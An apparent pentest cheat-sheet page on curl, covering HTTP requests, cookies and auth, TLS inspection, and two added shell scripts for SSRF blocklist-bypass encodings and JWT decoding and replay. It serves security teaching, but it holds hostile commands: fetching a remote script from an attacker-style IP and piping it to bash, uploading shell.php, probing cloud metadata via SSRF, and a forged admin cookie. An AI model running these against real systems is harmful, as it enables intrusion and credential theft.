CyberCheatsheets

curl Cheat Sheet

Versatile CLI for HTTP(S), file transfer, headers, and scripting web/API tests during pentests.

Category: Utilities & Shells | Tags: api, http, transfer | Updated 2026-06-02

Overview

curl transfers data with URL syntax. Core tool for probing APIs, bypassing client restrictions, testing SSRF payloads, downloading shells, and inspecting TLS/certificate behavior.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Install

sudo apt install -y curl
curl --version

Essential commands

GET with headers

curl -i https://target/api/v1/users

POST JSON

curl -s -X POST https://target/login \
  -H 'Content-Type: application/json' \
  -d '{"user":"admin","pass":"test"}'

Save output

curl -o page.html https://target/
curl -O https://target/file.zip   # remote filename

Common workflows

Authentication / cookies —

curl -c cookies.txt -b cookies.txt -L https://target/dashboard
curl -u user:pass https://target/basic-auth
curl -H "Authorization: Bearer TOKEN" https://target/api

Custom verbs and headers —

curl -X PUT -H 'X-Custom: value' -d 'data' https://target/resource
curl -X OPTIONS -i https://target/
curl -H "Host: internal.local" http://10.10.10.5/

SSRF / internal probe (authorized) —

curl -s "http://169.254.169.254/latest/meta-data/"
curl -g "http://[::ffff:169.254.169.254]/"
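The two probes above have curl fetch the metadata address directly. In an SSRF test the address is usually handed to the target application instead, and a naive blocklist that matches the literal string 169.254.169.254 may accept the same host written as a single decimal, hex, dotted-octal or IPv6-mapped literal. The following script is an added example, not part of the original cheat sheet: it generates those alternate encodings in pure POSIX sh and, only when TARGET is set, submits each one through curl's --data-urlencode to a hypothetical /fetch endpoint with a "url" form field (both names are assumptions about the target). curl itself normalizes these forms when they appear in its own URL, so they only tell you something when the target's parser sees them.

```shell
#!/bin/sh
# Added example (not from the original cheat sheet): alternate IPv4 encodings
# for SSRF blocklist testing. The probe loop runs only when TARGET is set.

# Split a dotted-quad into its four octets, printed space-separated.
split_ip() {
  old_ifs=$IFS; IFS=.
  set -- $1
  IFS=$old_ifs
  printf '%s %s %s %s' "$1" "$2" "$3" "$4"
}

# 169.254.169.254 -> 2852039166 (one 32-bit decimal number)
ip_to_dec() {
  set -- $(split_ip "$1")
  echo $(( $1 * 16777216 + $2 * 65536 + $3 * 256 + $4 ))
}

# 169.254.169.254 -> 0xa9fea9fe
ip_to_hex() {
  printf '0x%08x\n' "$(ip_to_dec "$1")"
}

# 169.254.169.254 -> 0251.0376.0251.0376 (dotted octal)
ip_to_octal() {
  set -- $(split_ip "$1")
  printf '0%o.0%o.0%o.0%o\n' "$1" "$2" "$3" "$4"
}

# One candidate URL per line: plain, decimal, hex, octal, IPv6-mapped.
ssrf_payloads() {
  ip=$1
  printf 'http://%s/\n' "$ip"
  printf 'http://%s/\n' "$(ip_to_dec "$ip")"
  printf 'http://%s/\n' "$(ip_to_hex "$ip")"
  printf 'http://%s/\n' "$(ip_to_octal "$ip")"
  printf 'http://[::ffff:%s]/\n' "$ip"
}

# Hypothetical target: an endpoint /fetch that retrieves the "url" form
# field server-side. Endpoint and field name are assumptions. Prints the
# HTTP status the application returned for each encoding.
probe_ssrf() {
  ssrf_payloads "$1" | while read -r candidate; do
    code=$(curl -s -o /dev/null -w '%{http_code}' --max-time 10 \
      --data-urlencode "url=$candidate" "$TARGET/fetch") || code=000
    printf '%s  %s\n' "$code" "$candidate"
  done
}

ssrf_payloads 169.254.169.254
if [ -n "${TARGET:-}" ]; then
  probe_ssrf 169.254.169.254
fi
```

Run it as `TARGET=https://target sh ssrf-encodings.sh` during an authorized test; without TARGET it only lists the candidate URLs.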

TLS / cert inspection —

curl -vI https://target/ 2>&1 | grep -E 'subject:|issuer:|SSL'
curl --insecure https://selfsigned.local/   # lab only

Upload file (multipart) —

curl -F "file=@shell.php" -F "submit=upload" https://target/upload.php

Rate / timing —

curl -w '@-' -o /dev/null -s https://target/ <<'EOF'
time_namelookup: %{time_namelookup}\n
time_connect: %{time_connect}\n
time_total: %{time_total}\n
EOF

Flags reference

-X METHOD                      HTTP method
-H "Header: val"               Request header
-d DATA                        Request body (implies POST and Content-Type: application/x-www-form-urlencoded unless -H overrides it)
-L                             Follow redirects
-k                             Insecure TLS: skip certificate verification (lab only)
-v                             Verbose: request/response headers and TLS handshake on stderr
-s                             Silent: no progress meter (add -S to still print errors)
--proxy http://127.0.0.1:8080  Route through Burp/ZAP (short form: -x)
-A "User-Agent"                Spoof UA

Quick one-liners

Show only the HTTP response headers

curl -sI https://target/

Print only the HTTP status code

curl -s -o /dev/null -w '%{http_code}\n' https://target/

Send a raw cookie header

curl -b 'session=eyJ...; role=admin' https://target/dashboard

Route all traffic through Burp/ZAP for inspection

curl -x http://127.0.0.1:8080 -k https://target/

Download and pipe a script straight to bash (lab only)

curl -s http://10.10.14.5/x.sh | bash

Follow redirects but cap them (avoid loops)

curl -L --max-redirs 5 https://target/

Resolve a host to a chosen IP (vhost / split-horizon tests)

curl --resolve target.local:443:10.10.10.5 https://target.local/

Send a urlencoded form body

curl --data-urlencode 'q=admin'\''--' https://target/search

Auth & API testing

Bearer token request to a JSON API

curl -s -H 'Authorization: Bearer TOKEN' https://target/api/v1/me | jq .

Basic auth

curl -u admin:password https://target/admin

Replay a captured JWT (the command sends it; decoding the payload is a separate step)

curl -s -H "Authorization: Bearer $JWT" https://target/api | jq .
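Before replaying a token it is worth reading its header and payload. JWT segments are base64url without padding, so `base64 -d` needs the alphabet swapped back and the `=` padding restored first. The script below is an added example, not code from the original cheat sheet: it decodes the header and payload with POSIX sh, coreutils and sed (no jq), extracts `alg` so an unsigned or unexpected algorithm stands out, and replays the token only when TARGET is set. The sample token is constructed inside the script with a placeholder signature; the /api/v1/me path is an assumption.

```shell
#!/bin/sh
# Added example (not from the original cheat sheet): decode and replay a JWT.

# base64url -> raw bytes. Argument: one unpadded base64url segment.
b64url_decode() {
  seg=$(printf '%s' "$1" | tr '_-' '/+')
  case $(( ${#seg} % 4 )) in
    2) seg="${seg}==" ;;
    3) seg="${seg}=" ;;
    1) echo "invalid base64url length" >&2; return 1 ;;
  esac
  printf '%s' "$seg" | base64 -d
}

jwt_part()    { printf '%s' "$1" | cut -d. -f"$2"; }
jwt_header()  { b64url_decode "$(jwt_part "$1" 1)"; }
jwt_payload() { b64url_decode "$(jwt_part "$1" 2)"; }

# Pull "alg" out of the header without jq. "none", or an algorithm the
# issuer is not known to use, deserves a closer look before replaying.
jwt_alg() {
  jwt_header "$1" | sed -n 's/.*"alg"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p'
}

# Constructed sample token so the example runs offline. "sig" is a
# placeholder, not a real signature.
b64url_encode() { printf '%s' "$1" | base64 | tr -d '=\n' | tr '+/' '-_'; }
SAMPLE_JWT="$(b64url_encode '{"alg":"HS256","typ":"JWT"}').$(b64url_encode '{"sub":"admin","role":"user"}').sig"

echo "alg:     $(jwt_alg "$SAMPLE_JWT")"
echo "header:  $(jwt_header "$SAMPLE_JWT")"
echo "payload: $(jwt_payload "$SAMPLE_JWT")"

# Replay only when a target is given, e.g.
#   TARGET=https://target JWT="$captured_token" sh jwt.sh
# The /api/v1/me path is an assumption about the target.
if [ -n "${TARGET:-}" ]; then
  curl -s -H "Authorization: Bearer ${JWT:-$SAMPLE_JWT}" "$TARGET/api/v1/me"
fi
```

On macOS older `base64` builds spell the decode flag `-D`; everything else is portable sh.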

GraphQL introspection query

curl -s -X POST https://target/graphql -H 'Content-Type: application/json' -d '{"query":"{__schema{types{name}}}"}'

Test an HTTP method override (verb tampering)

curl -X POST -H 'X-HTTP-Method-Override: PUT' https://target/resource

Tips

  • Use --path-as-is to send ../ and ./ segments literally instead of letting curl squash them (path traversal and cache-deception tests).
  • curl --compressed sends Accept-Encoding for the algorithms the build supports (gzip, and br/zstd where compiled in) and decompresses the response.
  • Pipe to jq for JSON APIs: curl -s URL | jq .
  • Prefer Burp Repeater for complex sessions; curl for automation and CI.
